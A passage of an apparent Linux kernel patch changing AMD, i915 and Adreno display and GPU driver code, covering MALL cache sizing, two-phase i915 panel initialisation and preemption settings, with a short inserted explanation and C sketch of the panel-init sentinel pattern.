+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 9919c39f7ea03..d70c64a9fcb2c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2109,13 +2109,19 @@ static bool dcn32_resource_construct(
+ 	dc->caps.max_cursor_size = 64;
+ 	dc->caps.min_horizontal_blanking_period = 80;
+ 	dc->caps.dmdata_alloc_size = 2048;
+-	dc->caps.mall_size_per_mem_channel = 0;
++	dc->caps.mall_size_per_mem_channel = 4;
+ 	dc->caps.mall_size_total = 0;
+ 	dc->caps.cursor_cache_size = dc->caps.max_cursor_size * dc->caps.max_cursor_size * 8;
+ 
+ 	dc->caps.cache_line_size = 64;
+ 	dc->caps.cache_num_ways = 16;
+-	dc->caps.max_cab_allocation_bytes = 67108864; // 64MB = 1024 * 1024 * 64
++
++	/* Calculate the available MALL space */
++	dc->caps.max_cab_allocation_bytes = dcn32_calc_num_avail_chans_for_mall(
++		dc, dc->ctx->dc_bios->vram_info.num_chans) *
++		dc->caps.mall_size_per_mem_channel * 1024 * 1024;
++	dc->caps.mall_size_total = dc->caps.max_cab_allocation_bytes;
++
+ 	dc->caps.subvp_fw_processing_delay_us = 15;
+ 	dc->caps.subvp_prefetch_end_to_mall_start_us = 15;
+ 	dc->caps.subvp_swath_height_margin_lines = 16;
+@@ -2545,3 +2551,55 @@ struct pipe_ctx *dcn32_acquire_idle_pipe_for_head_pipe_in_layer(
+ 
+ 	return idle_pipe;
+ }
++
++unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans)
++{
++	/*
++	 * DCN32 and DCN321 SKUs may have different sizes for MALL
++	 *  but we may not be able to access all the MALL space.
++	 *  If num_chans is a power of 2, then we can access all
++	 *  of the available MALL space.  Otherwise, we can only
++	 *  access:
++	 *
++	 *  max_cab_size_in_bytes = total_cache_size_in_bytes *
++	 *    ((2^floor(log2(num_chans)))/num_chans)
++	 *
++	 * Calculating the MALL sizes for all available SKUs, we
++	 *  have come up with the following simplified checks.
++	 * - we have max_chans, which provides the max MALL size.
++	 *  Each channel supports 4 MB of MALL, so:
++	 *
++	 *  total_cache_size_in_bytes = max_chans * 4 MB
++	 *
++	 * - we have avail_chans, which is the number of channels
++	 *  we can use if we can't access the entire MALL space.
++	 *  It is generally half of max_chans.
++	 * - so we use the following checks:
++	 *
++	 *   if (num_chans == max_chans), return max_chans
++	 *   if (num_chans < max_chans), return avail_chans
++	 *
++	 * - exception is GC_11_0_0 where we can't access max_chans,
++	 *  so we define max_avail_chans as the maximum available
++	 *  MALL space
++	 *
++	 */
++	int gc_11_0_0_max_chans = 48;
++	int gc_11_0_0_max_avail_chans = 32;
++	int gc_11_0_0_avail_chans = 16;
++	int gc_11_0_3_max_chans = 16;
++	int gc_11_0_3_avail_chans = 8;
++	int gc_11_0_2_max_chans = 8;
++	int gc_11_0_2_avail_chans = 4;
++
++	if (ASICREV_IS_GC_11_0_0(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_0_max_chans) ?
++			gc_11_0_0_max_avail_chans : gc_11_0_0_avail_chans;
++	} else if (ASICREV_IS_GC_11_0_2(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_2_max_chans) ?
++			gc_11_0_2_max_chans : gc_11_0_2_avail_chans;
++	} else { // if (ASICREV_IS_GC_11_0_3(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_3_max_chans) ?
++			gc_11_0_3_max_chans : gc_11_0_3_avail_chans;
++	}
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+index f76120e67c16a..615244a1f95d5 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+@@ -142,6 +142,10 @@ void dcn32_restore_mall_state(struct dc *dc,
+ 		struct dc_state *context,
+ 		struct mall_temp_config *temp_config);
+ 
++bool dcn32_allow_subvp_with_active_margin(struct pipe_ctx *pipe);
++
++unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans);
++
+ /* definitions for run time init of reg offsets */
+ 
+ /* CLK SRC */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index 6292ac515d1a4..d320e21680da1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1697,11 +1697,18 @@ static bool dcn321_resource_construct(
+ 	dc->caps.max_cursor_size = 64;
+ 	dc->caps.min_horizontal_blanking_period = 80;
+ 	dc->caps.dmdata_alloc_size = 2048;
+-	dc->caps.mall_size_per_mem_channel = 0;
++	dc->caps.mall_size_per_mem_channel = 4;
+ 	dc->caps.mall_size_total = 0;
+ 	dc->caps.cursor_cache_size = dc->caps.max_cursor_size * dc->caps.max_cursor_size * 8;
+ 	dc->caps.cache_line_size = 64;
+ 	dc->caps.cache_num_ways = 16;
++
++	/* Calculate the available MALL space */
++	dc->caps.max_cab_allocation_bytes = dcn32_calc_num_avail_chans_for_mall(
++		dc, dc->ctx->dc_bios->vram_info.num_chans) *
++		dc->caps.mall_size_per_mem_channel * 1024 * 1024;
++	dc->caps.mall_size_total = dc->caps.max_cab_allocation_bytes;
++
+ 	dc->caps.max_cab_allocation_bytes = 33554432; // 32MB = 1024 * 1024 * 32
+ 	dc->caps.subvp_fw_processing_delay_us = 15;
+ 	dc->caps.subvp_prefetch_end_to_mall_start_us = 15;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index 04cc96e700981..e22b4b3880af9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -676,7 +676,9 @@ static bool dcn32_assign_subvp_pipe(struct dc *dc,
+ 		 */
+ 		if (pipe->plane_state && !pipe->top_pipe &&
+ 				pipe->stream->mall_stream_config.type == SUBVP_NONE && refresh_rate < 120 && !pipe->plane_state->address.tmz_surface &&
+-				vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] <= 0) {
++				(vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] <= 0 ||
++				(vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] > 0 &&
++						dcn32_allow_subvp_with_active_margin(pipe)))) {
+ 			while (pipe) {
+ 				num_pipes++;
+ 				pipe = pipe->bottom_pipe;
+@@ -2379,8 +2381,11 @@ void dcn32_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_pa
+ 		}
+ 
+ 		/* Override from VBIOS for num_chan */
+-		if (dc->ctx->dc_bios->vram_info.num_chans)
++		if (dc->ctx->dc_bios->vram_info.num_chans) {
+ 			dcn3_2_soc.num_chans = dc->ctx->dc_bios->vram_info.num_chans;
++			dcn3_2_soc.mall_allocated_for_dcn_mbytes = (double)(dcn32_calc_num_avail_chans_for_mall(dc,
++				dc->ctx->dc_bios->vram_info.num_chans) * dc->caps.mall_size_per_mem_channel);
++		}
+ 
+ 		if (dc->ctx->dc_bios->vram_info.dram_channel_width_bytes)
+ 			dcn3_2_soc.dram_channel_width_bytes = dc->ctx->dc_bios->vram_info.dram_channel_width_bytes;
+@@ -2558,3 +2563,30 @@ void dcn32_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
+ 	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
+ 	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
+ }
++
++bool dcn32_allow_subvp_with_active_margin(struct pipe_ctx *pipe)
++{
++	bool allow = false;
++	uint32_t refresh_rate = 0;
++
++	/* For now, allow SubVP with active margin only on 2560x1440@60Hz
++	 * displays, with no scaling.
++	 *
++	 * Restricting to 2560x1440@60Hz enables 4K60 + 1440p60 configs
++	 * for p-state switching.
++	 */
++	if (pipe->stream && pipe->plane_state) {
++		refresh_rate = (pipe->stream->timing.pix_clk_100hz * 100 +
++						pipe->stream->timing.v_total * pipe->stream->timing.h_total - 1)
++						/ (double)(pipe->stream->timing.v_total * pipe->stream->timing.h_total);
++		if (pipe->stream->timing.v_addressable == 1440 &&
++				pipe->stream->timing.h_addressable == 2560 &&
++				refresh_rate >= 55 && refresh_rate <= 65 &&
++				pipe->plane_state->src_rect.height == 1440 &&
++				pipe->plane_state->src_rect.width == 2560 &&
++				pipe->plane_state->dst_rect.height == 1440 &&
++				pipe->plane_state->dst_rect.width == 2560)
++			allow = true;
++	}
++	return allow;
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index 0ea406145c1d7..b80cef70fa60f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -534,8 +534,11 @@ void dcn321_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_p
+ 		}
+ 
+ 		/* Override from VBIOS for num_chan */
+-		if (dc->ctx->dc_bios->vram_info.num_chans)
++		if (dc->ctx->dc_bios->vram_info.num_chans) {
+ 			dcn3_21_soc.num_chans = dc->ctx->dc_bios->vram_info.num_chans;
++			dcn3_21_soc.mall_allocated_for_dcn_mbytes = (double)(dcn32_calc_num_avail_chans_for_mall(dc,
++				dc->ctx->dc_bios->vram_info.num_chans) * dc->caps.mall_size_per_mem_channel);
++		}
+ 
+ 		if (dc->ctx->dc_bios->vram_info.dram_channel_width_bytes)
+ 			dcn3_21_soc.dram_channel_width_bytes = dc->ctx->dc_bios->vram_info.dram_channel_width_bytes;
+diff --git a/drivers/gpu/drm/display/drm_hdmi_helper.c b/drivers/gpu/drm/display/drm_hdmi_helper.c
+index 0264abe552788..faf5e9efa7d33 100644
+--- a/drivers/gpu/drm/display/drm_hdmi_helper.c
++++ b/drivers/gpu/drm/display/drm_hdmi_helper.c
+@@ -44,10 +44,8 @@ int drm_hdmi_infoframe_set_hdr_metadata(struct hdmi_drm_infoframe *frame,
+ 
+ 	/* Sink EOTF is Bit map while infoframe is absolute values */
+ 	if (!is_eotf_supported(hdr_metadata->hdmi_metadata_type1.eotf,
+-	    connector->hdr_sink_metadata.hdmi_type1.eotf)) {
+-		DRM_DEBUG_KMS("EOTF Not Supported\n");
+-		return -EINVAL;
+-	}
++	    connector->hdr_sink_metadata.hdmi_type1.eotf))
++		DRM_DEBUG_KMS("Unknown EOTF %d\n", hdr_metadata->hdmi_metadata_type1.eotf);
+ 
+ 	err = hdmi_drm_infoframe_init(frame);
+ 	if (err < 0)
+diff --git a/drivers/gpu/drm/drm_atomic.c b/drivers/gpu/drm/drm_atomic.c
+index f197f59f6d99b..c0dc5858a7237 100644
+--- a/drivers/gpu/drm/drm_atomic.c
++++ b/drivers/gpu/drm/drm_atomic.c
+@@ -1070,6 +1070,7 @@ static void drm_atomic_connector_print_state(struct drm_printer *p,
+ 	drm_printf(p, "connector[%u]: %s\n", connector->base.id, connector->name);
+ 	drm_printf(p, "\tcrtc=%s\n", state->crtc ? state->crtc->name : "(null)");
+ 	drm_printf(p, "\tself_refresh_aware=%d\n", state->self_refresh_aware);
++	drm_printf(p, "\tmax_requested_bpc=%d\n", state->max_requested_bpc);
+ 
+ 	if (connector->connector_type == DRM_MODE_CONNECTOR_WRITEBACK)
+ 		if (state->writeback_job && state->writeback_job->fb)
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index ed4d93942dbd2..ecd6c5c3f4ded 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -2053,7 +2053,8 @@ void icl_dsi_init(struct drm_i915_private *dev_priv)
+ 	/* attach connector to encoder */
+ 	intel_connector_attach_encoder(intel_connector, encoder);
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL, NULL);
++	encoder->devdata = intel_bios_encoder_data_lookup(dev_priv, port);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, encoder->devdata, NULL);
+ 
+ 	mutex_lock(&dev->mode_config.mutex);
+ 	intel_panel_add_vbt_lfp_fixed_mode(intel_connector);
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index 178a8cbb75838..a70b7061742a8 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -620,14 +620,14 @@ static void dump_pnp_id(struct drm_i915_private *i915,
+ 
+ static int opregion_get_panel_type(struct drm_i915_private *i915,
+ 				   const struct intel_bios_encoder_data *devdata,
+-				   const struct edid *edid)
++				   const struct edid *edid, bool use_fallback)
+ {
+ 	return intel_opregion_get_panel_type(i915);
+ }
+ 
+ static int vbt_get_panel_type(struct drm_i915_private *i915,
+ 			      const struct intel_bios_encoder_data *devdata,
+-			      const struct edid *edid)
++			      const struct edid *edid, bool use_fallback)
+ {
+ 	const struct bdb_lvds_options *lvds_options;
+ 
+@@ -652,7 +652,7 @@ static int vbt_get_panel_type(struct drm_i915_private *i915,
+ 
+ static int pnpid_get_panel_type(struct drm_i915_private *i915,
+ 				const struct intel_bios_encoder_data *devdata,
+-				const struct edid *edid)
++				const struct edid *edid, bool use_fallback)
+ {
+ 	const struct bdb_lvds_lfp_data *data;
+ 	const struct bdb_lvds_lfp_data_ptrs *ptrs;
+@@ -701,9 +701,9 @@ static int pnpid_get_panel_type(struct drm_i915_private *i915,
+ 
+ static int fallback_get_panel_type(struct drm_i915_private *i915,
+ 				   const struct intel_bios_encoder_data *devdata,
+-				   const struct edid *edid)
++				   const struct edid *edid, bool use_fallback)
+ {
+-	return 0;
++	return use_fallback ? 0 : -1;
+ }
+ 
+ enum panel_type {
+@@ -715,13 +715,13 @@ enum panel_type {
+ 
+ static int get_panel_type(struct drm_i915_private *i915,
+ 			  const struct intel_bios_encoder_data *devdata,
+-			  const struct edid *edid)
++			  const struct edid *edid, bool use_fallback)
+ {
+ 	struct {
+ 		const char *name;
+ 		int (*get_panel_type)(struct drm_i915_private *i915,
+ 				      const struct intel_bios_encoder_data *devdata,
+-				      const struct edid *edid);
++				      const struct edid *edid, bool use_fallback);
+ 		int panel_type;
+ 	} panel_types[] = {
+ 		[PANEL_TYPE_OPREGION] = {
+@@ -744,7 +744,8 @@ static int get_panel_type(struct drm_i915_private *i915,
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(panel_types); i++) {
+-		panel_types[i].panel_type = panel_types[i].get_panel_type(i915, devdata, edid);
++		panel_types[i].panel_type = panel_types[i].get_panel_type(i915, devdata,
++									  edid, use_fallback);
+ 
+ 		drm_WARN_ON(&i915->drm, panel_types[i].panel_type > 0xf &&
+ 			    panel_types[i].panel_type != 0xff);
+@@ -2592,6 +2593,12 @@ intel_bios_encoder_supports_edp(const struct intel_bios_encoder_data *devdata)
+ 		devdata->child.device_type & DEVICE_TYPE_INTERNAL_CONNECTOR;
+ }
+ 
++static bool
++intel_bios_encoder_supports_dsi(const struct intel_bios_encoder_data *devdata)
++{
++	return devdata->child.device_type & DEVICE_TYPE_MIPI_OUTPUT;
++}
++
+ static int _intel_bios_hdmi_level_shift(const struct intel_bios_encoder_data *devdata)
+ {
+ 	if (!devdata || devdata->i915->display.vbt.version < 158)
+@@ -2642,7 +2649,7 @@ static void print_ddi_port(const struct intel_bios_encoder_data *devdata,
+ {
+ 	struct drm_i915_private *i915 = devdata->i915;
+ 	const struct child_device_config *child = &devdata->child;
+-	bool is_dvi, is_hdmi, is_dp, is_edp, is_crt, supports_typec_usb, supports_tbt;
++	bool is_dvi, is_hdmi, is_dp, is_edp, is_dsi, is_crt, supports_typec_usb, supports_tbt;
+ 	int dp_boost_level, dp_max_link_rate, hdmi_boost_level, hdmi_level_shift, max_tmds_clock;
+ 
+ 	is_dvi = intel_bios_encoder_supports_dvi(devdata);
+@@ -2650,13 +2657,14 @@ static void print_ddi_port(const struct intel_bios_encoder_data *devdata,
+ 	is_crt = intel_bios_encoder_supports_crt(devdata);
+ 	is_hdmi = intel_bios_encoder_supports_hdmi(devdata);
+ 	is_edp = intel_bios_encoder_supports_edp(devdata);
++	is_dsi = intel_bios_encoder_supports_dsi(devdata);
+ 
+ 	supports_typec_usb = intel_bios_encoder_supports_typec_usb(devdata);
+ 	supports_tbt = intel_bios_encoder_supports_tbt(devdata);
+ 
+ 	drm_dbg_kms(&i915->drm,
+-		    "Port %c VBT info: CRT:%d DVI:%d HDMI:%d DP:%d eDP:%d LSPCON:%d USB-Type-C:%d TBT:%d DSC:%d\n",
+-		    port_name(port), is_crt, is_dvi, is_hdmi, is_dp, is_edp,
++		    "Port %c VBT info: CRT:%d DVI:%d HDMI:%d DP:%d eDP:%d DSI:%d LSPCON:%d USB-Type-C:%d TBT:%d DSC:%d\n",
++		    port_name(port), is_crt, is_dvi, is_hdmi, is_dp, is_edp, is_dsi,
+ 		    HAS_LSPCON(i915) && child->lspcon,
+ 		    supports_typec_usb, supports_tbt,
+ 		    devdata->dsc != NULL);
+@@ -2701,6 +2709,8 @@ static void parse_ddi_port(struct intel_bios_encoder_data *devdata)
+ 	enum port port;
+ 
+ 	port = dvo_port_to_port(i915, child->dvo_port);
++	if (port == PORT_NONE && DISPLAY_VER(i915) >= 11)
++		port = dsi_dvo_port_to_port(i915, child->dvo_port);
+ 	if (port == PORT_NONE)
+ 		return;
+ 
+@@ -3191,14 +3201,26 @@ out:
+ 	kfree(oprom_vbt);
+ }
+ 
+-void intel_bios_init_panel(struct drm_i915_private *i915,
+-			   struct intel_panel *panel,
+-			   const struct intel_bios_encoder_data *devdata,
+-			   const struct edid *edid)
++static void intel_bios_init_panel(struct drm_i915_private *i915,
++				  struct intel_panel *panel,
++				  const struct intel_bios_encoder_data *devdata,
++				  const struct edid *edid,
++				  bool use_fallback)
+ {
+-	init_vbt_panel_defaults(panel);
++	/* already have it? */
++	if (panel->vbt.panel_type >= 0) {
++		drm_WARN_ON(&i915->drm, !use_fallback);
++		return;
++	}
+ 
+-	panel->vbt.panel_type = get_panel_type(i915, devdata, edid);
++	panel->vbt.panel_type = get_panel_type(i915, devdata,
++					       edid, use_fallback);
++	if (panel->vbt.panel_type < 0) {
++		drm_WARN_ON(&i915->drm, use_fallback);
++		return;
++	}
++
++	init_vbt_panel_defaults(panel);
+ 
+ 	parse_panel_options(i915, panel);
+ 	parse_generic_dtd(i915, panel);
+@@ -3213,6 +3235,21 @@ void intel_bios_init_panel(struct drm_i915_private *i915,
+ 	parse_mipi_sequence(i915, panel);
+ }
+ 
++void intel_bios_init_panel_early(struct drm_i915_private *i915,
++				 struct intel_panel *panel,
++				 const struct intel_bios_encoder_data *devdata)
++{
++	intel_bios_init_panel(i915, panel, devdata, NULL, false);
++}
++
++void intel_bios_init_panel_late(struct drm_i915_private *i915,
++				struct intel_panel *panel,
++				const struct intel_bios_encoder_data *devdata,
++				const struct edid *edid)
++{
++	intel_bios_init_panel(i915, panel, devdata, edid, true);
++}
++
+ /**
+  * intel_bios_driver_remove - Free any resources allocated by intel_bios_init()
+  * @i915: i915 device instance
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.h b/drivers/gpu/drm/i915/display/intel_bios.h
+index e375405a78284..ff1fdd2e0c1c5 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.h
++++ b/drivers/gpu/drm/i915/display/intel_bios.h
+@@ -232,10 +232,13 @@ struct mipi_pps_data {
+ } __packed;
+ 
+ void intel_bios_init(struct drm_i915_private *dev_priv);
+-void intel_bios_init_panel(struct drm_i915_private *dev_priv,
+-			   struct intel_panel *panel,
+-			   const struct intel_bios_encoder_data *devdata,
+-			   const struct edid *edid);
++void intel_bios_init_panel_early(struct drm_i915_private *dev_priv,
++				 struct intel_panel *panel,
++				 const struct intel_bios_encoder_data *devdata);
++void intel_bios_init_panel_late(struct drm_i915_private *dev_priv,
++				struct intel_panel *panel,
++				const struct intel_bios_encoder_data *devdata,
++				const struct edid *edid);
+ void intel_bios_fini_panel(struct intel_panel *panel);
+ void intel_bios_driver_remove(struct drm_i915_private *dev_priv);
+ bool intel_bios_is_valid_vbt(const void *buf, size_t size);
+diff --git a/drivers/gpu/drm/i915/display/intel_connector.c b/drivers/gpu/drm/i915/display/intel_connector.c
+index 6d5cbeb8df4da..8bb296f3d6252 100644
+--- a/drivers/gpu/drm/i915/display/intel_connector.c
++++ b/drivers/gpu/drm/i915/display/intel_connector.c
+@@ -54,7 +54,7 @@ int intel_connector_init(struct intel_connector *connector)
+ 	__drm_atomic_helper_connector_reset(&connector->base,
+ 					    &conn_state->base);
+ 
+-	INIT_LIST_HEAD(&connector->panel.fixed_modes);
++	intel_panel_init_alloc(connector);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index 298d00a11f473..135dbcab62b28 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -291,7 +291,7 @@ struct intel_vbt_panel_data {
+ 	struct drm_display_mode *sdvo_lvds_vbt_mode; /* if any */
+ 
+ 	/* Feature bits */
+-	unsigned int panel_type:4;
++	int panel_type;
+ 	unsigned int lvds_dither:1;
+ 	unsigned int bios_lvds_val; /* initial [PCH_]LVDS reg val in VBIOS */
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index b94bcceeff705..2e09899f2f927 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -5179,6 +5179,9 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 		return false;
+ 	}
+ 
++	intel_bios_init_panel_early(dev_priv, &intel_connector->panel,
++				    encoder->devdata);
++
+ 	intel_pps_init(intel_dp);
+ 
+ 	/* Cache DPCD and EDID for edp. */
+@@ -5213,8 +5216,8 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 	}
+ 	intel_connector->edid = edid;
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel,
+-			      encoder->devdata, IS_ERR(edid) ? NULL : edid);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel,
++				   encoder->devdata, IS_ERR(edid) ? NULL : edid);
+ 
+ 	intel_panel_add_edid_fixed_modes(intel_connector, true);
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_lvds.c b/drivers/gpu/drm/i915/display/intel_lvds.c
+index e5352239b2a2f..a749a5a66d624 100644
+--- a/drivers/gpu/drm/i915/display/intel_lvds.c
++++ b/drivers/gpu/drm/i915/display/intel_lvds.c
+@@ -967,8 +967,8 @@ void intel_lvds_init(struct drm_i915_private *dev_priv)
+ 	}
+ 	intel_connector->edid = edid;
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL,
+-			      IS_ERR(edid) ? NULL : edid);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, NULL,
++				   IS_ERR(edid) ? NULL : edid);
+ 
+ 	/* Try EDID first */
+ 	intel_panel_add_edid_fixed_modes(intel_connector,
+diff --git a/drivers/gpu/drm/i915/display/intel_panel.c b/drivers/gpu/drm/i915/display/intel_panel.c
+index f72f4646c0d70..b50db0dd20fc5 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.c
++++ b/drivers/gpu/drm/i915/display/intel_panel.c
+@@ -648,6 +648,14 @@ intel_panel_mode_valid(struct intel_connector *connector,
+ 	return MODE_OK;
+ }
+ 
++void intel_panel_init_alloc(struct intel_connector *connector)
++{
++	struct intel_panel *panel = &connector->panel;
++
++	connector->panel.vbt.panel_type = -1;
++	INIT_LIST_HEAD(&panel->fixed_modes);
++}
++
+ int intel_panel_init(struct intel_connector *connector)
+ {
+ 	struct intel_panel *panel = &connector->panel;
+diff --git a/drivers/gpu/drm/i915/display/intel_panel.h b/drivers/gpu/drm/i915/display/intel_panel.h
+index 5c5b5b7f95b6c..4b51e1c51da62 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.h
++++ b/drivers/gpu/drm/i915/display/intel_panel.h
+@@ -18,6 +18,7 @@ struct intel_connector;
+ struct intel_crtc_state;
+ struct intel_encoder;
+ 
++void intel_panel_init_alloc(struct intel_connector *connector);
+ int intel_panel_init(struct intel_connector *connector);
+ void intel_panel_fini(struct intel_connector *connector);
+ enum drm_connector_status
+diff --git a/drivers/gpu/drm/i915/display/intel_sdvo.c b/drivers/gpu/drm/i915/display/intel_sdvo.c
+index 774c1dc31a521..a15e09b551708 100644
+--- a/drivers/gpu/drm/i915/display/intel_sdvo.c
++++ b/drivers/gpu/drm/i915/display/intel_sdvo.c
+@@ -2891,7 +2891,7 @@ intel_sdvo_lvds_init(struct intel_sdvo *intel_sdvo, int device)
+ 	if (!intel_sdvo_create_enhance_property(intel_sdvo, intel_sdvo_connector))
+ 		goto err;
+ 
+-	intel_bios_init_panel(i915, &intel_connector->panel, NULL, NULL);
++	intel_bios_init_panel_late(i915, &intel_connector->panel, NULL, NULL);
+ 
+ 	/*
+ 	 * Fetch modes from VBT. For SDVO prefer the VBT mode since some
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index b3f5ca280ef26..90e3e41095b34 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -1925,7 +1925,7 @@ void vlv_dsi_init(struct drm_i915_private *dev_priv)
+ 
+ 	intel_dsi->panel_power_off_time = ktime_get_boottime();
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL, NULL);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, NULL, NULL);
+ 
+ 	if (intel_connector->panel.vbt.dsi.config->dual_link)
+ 		intel_dsi->ports = BIT(PORT_A) | BIT(PORT_C);
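
The i915 hunks above split panel initialization into an early pass (no EDID, no fallback) and a late pass (EDID available, fallback allowed), using panel_type == -1 as a "not yet initialized" sentinel so the late pass becomes a no-op when the early pass already succeeded. A minimal userspace sketch of that sentinel-guarded two-phase pattern follows; the names (pick_type, panel_init) are purely illustrative and are not the i915 API.

/*
 * panel_type starts at -1 ("not yet chosen"). The early pass may
 * legally fail to pick a type because fallback is not allowed; the
 * late pass either reuses the early result or falls back to type 0.
 */
#include <stdio.h>

struct panel { int panel_type; };

static int pick_type(int have_vbt_match, int use_fallback)
{
	if (have_vbt_match)
		return 2;                     /* a real panel type was found */
	return use_fallback ? 0 : -1;         /* fall back only when allowed */
}

static void panel_init(struct panel *p, int have_vbt_match, int use_fallback)
{
	if (p->panel_type >= 0)               /* already initialized earlier */
		return;

	p->panel_type = pick_type(have_vbt_match, use_fallback);
	if (p->panel_type < 0)                /* early pass may fail quietly */
		return;

	/* ... parse per-panel data keyed off panel_type ... */
}

int main(void)
{
	struct panel p = { .panel_type = -1 };

	panel_init(&p, 0, 0);   /* early: no VBT match, no fallback, stays -1 */
	printf("after early pass: %d\n", p.panel_type);

	panel_init(&p, 0, 1);   /* late: fallback permitted, becomes 0 */
	printf("after late pass: %d\n", p.panel_type);
	return 0;
}
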
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 3dcec7acb3840..4f0dbeebb79fb 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -151,8 +151,8 @@ static void a5xx_submit(struct msm_gpu *gpu, struct msm_gem_submit *submit)
+ 	OUT_RING(ring, 1);
+ 
+ 	/* Enable local preemption for finegrain preemption */
+-	OUT_PKT7(ring, CP_PREEMPT_ENABLE_GLOBAL, 1);
+-	OUT_RING(ring, 0x02);
++	OUT_PKT7(ring, CP_PREEMPT_ENABLE_LOCAL, 1);
++	OUT_RING(ring, 0x1);
+ 
+ 	/* Allow CP_CONTEXT_SWITCH_YIELD packets in the IB2 */
+ 	OUT_PKT7(ring, CP_YIELD_ENABLE, 1);
+@@ -808,7 +808,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 	gpu_write(gpu, REG_A5XX_RBBM_AHB_CNTL2, 0x0000003F);
+ 
+ 	/* Set the highest bank bit */
+-	if (adreno_is_a540(adreno_gpu))
++	if (adreno_is_a540(adreno_gpu) || adreno_is_a530(adreno_gpu))
+ 		regbit = 2;
+ 	else
+ 		regbit = 1;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+index 8abc9a2b114a2..e0eef47dae632 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
